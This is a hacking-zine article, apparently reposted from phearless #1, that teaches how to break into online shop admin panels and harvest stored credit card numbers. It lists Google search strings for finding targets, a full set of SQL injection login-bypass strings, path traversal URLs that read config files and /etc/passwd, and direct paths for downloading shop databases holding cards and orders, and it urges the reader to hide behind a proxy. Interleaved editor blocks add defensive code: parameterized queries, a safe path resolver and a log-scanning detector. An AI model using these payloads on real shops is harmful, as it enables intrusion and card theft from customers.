
1x09 Exploiting ShopAdmin

Published in phearless · 10 months ago

...................
...::: phearless zine #1 :::...

.....................>---[ Exploiting ShopAdmin ]---<.......................

...........................>---[ by Re00t ]---<.............................
Re00t[at]ii-labs[dot]org

CONTENTS:

[0] Introduction
[1] ASP ShopAdmins
[2] Alabanza AlaCar
[3] CommerceSQL
[4] Meta Cart
[5] shop.pl
[6] Windows ShopAdmins
[7] The End



////////////////////////////////////////////////////////////////////////////
--==<[ 0. Introduction
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

So I too have decided to write a text for the eZine... I decided to write
about the vulnerabilities of various shops, collecting cc's and everything
that concerns shopadmins, since I haven't seen a single local text about it!
If you need any help you can contact me at my e-mail ( Re00t@ii-labs.org )
or on irc.krstarica.org #HackGen !!!



////////////////////////////////////////////////////////////////////////////
--==<[ 1. ASP ShopAdmins
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

So you have to search Google for shop.asp -> that is the most common one, but
you can also search for these:

shopadmin1.asp
adminindex.html
shopa_displayorders.asp?page=2
shopa_displayorders.asp
shopa.asp
displayorders.asp
admin.asp
orders.asp
vieworders.asp
view_orders.asp

Once you find a shopadmin, you of course first have to find the vulnerable
ones... then use the following strings to get into them:

'or'1
'or''='
'='
Admin
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

Copy these strings and put the same string in both username and password...
if the shop is vulnerable, you should get access to the orders, logs and the
rest...

*** USE A PROXY ***
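
Why the strings above get past a login form, and what stops them, shown as an added example that is not part of the original article: the first function builds the query by string concatenation, the second binds the input as parameters and checks a salted hash. The SQLite table, the sample account and all function names are assumptions made for this illustration.

```python
import hashlib, hmac, os, sqlite3

def pw_hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_db():
    """Constructed sample data: one admin account, held in memory."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (username TEXT PRIMARY KEY,"
               " password TEXT, salt BLOB, pwhash BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO admins VALUES (?, ?, ?, ?)",
               ("admin", "S3cret!", salt, pw_hash("S3cret!", salt)))
    return db

def login_concatenated(db, username, password):
    """Legacy pattern: form input is pasted into the SQL text."""
    sql = ("SELECT 1 FROM admins WHERE username = '" + username +
           "' AND password = '" + password + "'")
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # the input broke the statement instead of bypassing it

def login_parameterized(db, username, password):
    """Input is bound as data; the password is checked against a salted hash."""
    row = db.execute("SELECT salt, pwhash FROM admins WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(pw_hash(password, row[0]), row[1])

# A few of the strings listed above, used as both username and password.
PAGE_STRINGS = ["'or''='", "admin'--", "' or 'x'='x", "' or 1=1--",
                "hi' or 'a'='a"]

def compare(db):
    """Map each string to (concatenated result, parameterized result)."""
    return {s: (login_concatenated(db, s, s), login_parameterized(db, s, s))
            for s in PAGE_STRINGS}

if __name__ == "__main__":
    for s, (old, new) in compare(make_db()).items():
        print(f"{s!r:18} concatenated={old} parameterized={new}")
```

With bound parameters the quote characters never reach the SQL parser as syntax, so the same input is just an unknown username.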



////////////////////////////////////////////////////////////////////////////
--==<[ 2. Alabanza AlaCar
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

OK, this one is easy to exploit; search Google for:

s-cart/admin

Once you find it, log in with:

Username: =
Password: =

*** USE A PROXY ***



////////////////////////////////////////////////////////////////////////////
--==<[ 3. CommerceSQL
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Exploit CommerceSQL in the following way once you find a CommerceSQL SHOP!
Enter these URLs:

Example:

http://www.domena.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl

http://www.domena.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi

http://www.domena.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log

Or, if you want to go through Google:

admin/files/order.log

*** USE A PROXY ***



////////////////////////////////////////////////////////////////////////////
--==<[ 4. Meta Cart
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Meta Cart is a free shop, meaning it is not charged for, and how to exploit
it ... :) Simple...

http://www.domena.com/database/metacart.mdb
http://www.domena.com/metacart/database/metacart.mdb

*** USE A PROXY ***



////////////////////////////////////////////////////////////////////////////
--==<[ 5. shop.pl
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

It is not very popular, but you will find it through Google. So type
shop.pl into Google.

And exploit it like this...

http://www.domena.com/cgi-local/shop.pl/page=shop.cfg is where the config file
is located.

http://www.domena.com/cgi-local/shop.pl/page=../../../../../../../../../../../../../../etc/passwd

http://www.domena.com/cgi-local/shop.pl/page=./product_list

*** USE A PROXY ***
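
The CommerceSQL and shop.pl requests above both depend on a `page` parameter being joined to a directory without any check. As an added example (not code from either product or from the original article), this is one way to resolve such a parameter safely; the directory layout, the `.html` allowlist and the function names are assumptions.

```python
import os, tempfile

class PageRejected(Exception):
    pass

def resolve_page(pages_dir, page, allowed_ext=(".html",)):
    """Return the real path for a requested page, or raise PageRejected."""
    root = os.path.realpath(pages_dir)
    if "\x00" in page or os.path.isabs(page):
        raise PageRejected("absolute path or NUL byte")
    # realpath collapses "../" and follows symlinks before the comparison.
    candidate = os.path.realpath(os.path.join(root, page))
    if os.path.commonpath([root, candidate]) != root:
        raise PageRejected("outside the pages directory")
    # Confinement alone would still serve shop.cfg, which sits beside the pages.
    if os.path.splitext(candidate)[1].lower() not in allowed_ext:
        raise PageRejected("file type is not served")
    if not os.path.isfile(candidate):
        raise PageRejected("no such page")
    return candidate

def build_sample_tree():
    """Constructed layout mirroring the paths named in the text."""
    top = tempfile.mkdtemp()
    files = ["pages/product_list.html", "pages/shop.cfg",
             "admin/admin_conf.pl", "admin/files/order.log"]
    for rel in files:
        path = os.path.join(top, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("sample\n")
    return os.path.join(top, "pages")  # the only directory meant to be served

def is_served(pages_dir, page):
    try:
        resolve_page(pages_dir, page)
        return True
    except PageRejected:
        return False

if __name__ == "__main__":
    pages = build_sample_tree()
    for p in ["./product_list.html", "shop.cfg", "../admin/admin_conf.pl",
              "../admin/files/order.log", "../" * 14 + "etc/passwd"]:
        print(f"{p[:40]:42} served={is_served(pages, p)}")
```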



////////////////////////////////////////////////////////////////////////////
--==<[ 6. Windows ShopAdmins
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

These are totally lame... everything goes through the database test :) Search
Google for links that end with:

shopdisplaycategories.asp

Once you find it, put this in place of shopdisplaycategories.asp:

shopdbtest.asp

Then look at what it says under xDatabase: shopping and xDblocation:\shop_db
and now append to the domain:

/shop_db/shopping.mdb

or wherever the shop is located, and you download the database with the CCs
and orders :-) !!!

*** USE A PROXY ***
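
The Meta Cart and Windows shop cases above come down to a database file and a diagnostic page being reachable over HTTP. As an added example (not part of the original article), the following scans a web access log for those requests and for the `page=` traversal pattern from the earlier sections; the log lines are constructed, and the rule and function names are assumptions.

```python
import re
from urllib.parse import unquote

# Rules derived from the request patterns the article describes.
RULES = [
    ("database-file", re.compile(r"\.mdb(\?|$)", re.I)),
    ("db-test-page", re.compile(r"/shopdbtest\.asp(\?|$)", re.I)),
    ("order-log", re.compile(r"/admin/files/order\.log(\?|$)", re.I)),
    ("page-traversal", re.compile(r"page=[^&\s]*\.\.[/\\]", re.I)),
]
# Common Log Format: ip ident user [time] "METHOD target PROTO" status size
LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                  r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

# Constructed sample log using documentation IP ranges, not real traffic.
SAMPLE_LOG = '''\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /shopdisplaycategories.asp HTTP/1.1" 200 5120
198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /shopdbtest.asp HTTP/1.1" 200 812
198.51.100.7 - - [01/Jan/2024:10:01:30 +0000] "GET /shop_db/shopping.mdb HTTP/1.1" 200 2097152
203.0.113.5 - - [01/Jan/2024:10:02:00 +0000] "GET /cgi-local/shop.pl/page=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 210
203.0.113.5 - - [01/Jan/2024:10:02:10 +0000] "GET /metacart/database/metacart.mdb HTTP/1.1" 403 199
203.0.113.5 - - [01/Jan/2024:10:02:20 +0000] "GET /cgi-bin/commercesql/index.cgi?page=../admin/files/order.log HTTP/1.1" 200 1024
'''.splitlines()

def scan(lines):
    """Return (line_no, ip, rule, served) for every suspicious request."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LINE.match(line)
        if not m:
            continue
        # Decode twice so double-encoded "../" sequences are also seen.
        target = unquote(unquote(m["target"]))
        for rule, rx in RULES:
            if rx.search(target):
                # served=True: the server answered 200, so data left the host.
                findings.append((n, m["ip"], rule, m["status"] == "200"))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Any finding with served=True is an exposure rather than a probe: the database file belongs outside the web root and the test page should not be deployed at all.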



////////////////////////////////////////////////////////////////////////////
--==<[ 7. The End
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Greetings to everyone from #ugs, #hackgen, #secure, #office on irc.krstarica.org
Everyone from HackGen, II-labs ...

